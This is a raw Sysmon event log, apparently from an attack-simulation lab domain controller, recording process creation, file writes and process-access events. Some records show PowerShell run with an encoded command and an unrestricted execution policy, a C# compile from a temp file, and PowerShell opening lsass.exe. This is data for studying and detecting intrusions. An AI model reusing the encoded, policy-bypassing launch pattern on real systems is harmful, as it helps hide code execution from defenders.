10:39:17.619{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\p2mkvfaq.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\p2mkvfaq.cmdline2020-10-09 10:39:17.609 11241100x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:17.609{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\p2mkvfaq.dll2020-10-09 10:39:17.609 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD5-5F80-0403-000000007E01}1496C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD5-5F80-0403-000000007E01}1496C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3DD5-5F80-0303-000000007E01}24284948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD5-5F80-0403-000000007E01}1496C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d82eae5b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778bce5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778b9b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d823d01b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d774c54c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d77aaa1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778e080|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778e080|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778df11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d777fe96|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778c3c9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778bfbc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778bce5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d778b9b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d823d01b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d7772817|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+d7771de7 154100x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.171{733EE690-3DD5-5F80-0403-000000007E01}1496C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.156{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.156{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.156{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.109{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.109{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.077{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ch2dxaxu.ljn.ps12020-10-09 10:39:17.077 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 